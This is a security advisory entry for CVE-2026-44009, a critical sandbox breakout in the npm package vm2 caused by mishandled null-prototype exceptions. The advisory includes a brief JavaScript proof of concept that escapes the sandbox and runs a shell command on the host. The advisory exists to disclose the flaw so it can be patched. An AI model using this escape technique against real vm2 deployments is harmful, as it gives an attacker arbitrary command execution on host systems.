GHSA-9vg3-4rfj-wgcm
Suggest an improvement- Source
- https://github.com/advisories/GHSA-9vg3-4rfj-wgcm
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-9vg3-4rfj-wgcm/GHSA-9vg3-4rfj-wgcm.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-9vg3-4rfj-wgcm
- Aliases
-
- CVE-2026-44009
- Published
- 2026-05-08T16:20:58Z
- Modified
- 2026-05-08T16:33:34.962271Z
- Severity
-
- 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- Summary
- vm2 has Sandbox Breakout Through Null Proto Exception
- Details
-
Summary
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
Details
In
handleExceptiondue to// SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`)exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the hostFunctionobject.PoC
const {VM} = require("vm2"); const vm = new VM(); console.log(vm.run(` const o = {__proto__: null}; try { throw o; } catch (e) { e.f = Buffer.prototype.inspect o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned'); } `));Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
- Database specific
{ "github_reviewed": true, "github_reviewed_at": "2026-05-08T16:20:58Z", "cwe_ids": [ "CWE-668" ], "severity": "CRITICAL", "nvd_published_at": null }- References
Affected packages
npm / vm2
Package
- Name
- vm2
- View open source insights on deps.dev
- Purl
- pkg:npm/vm2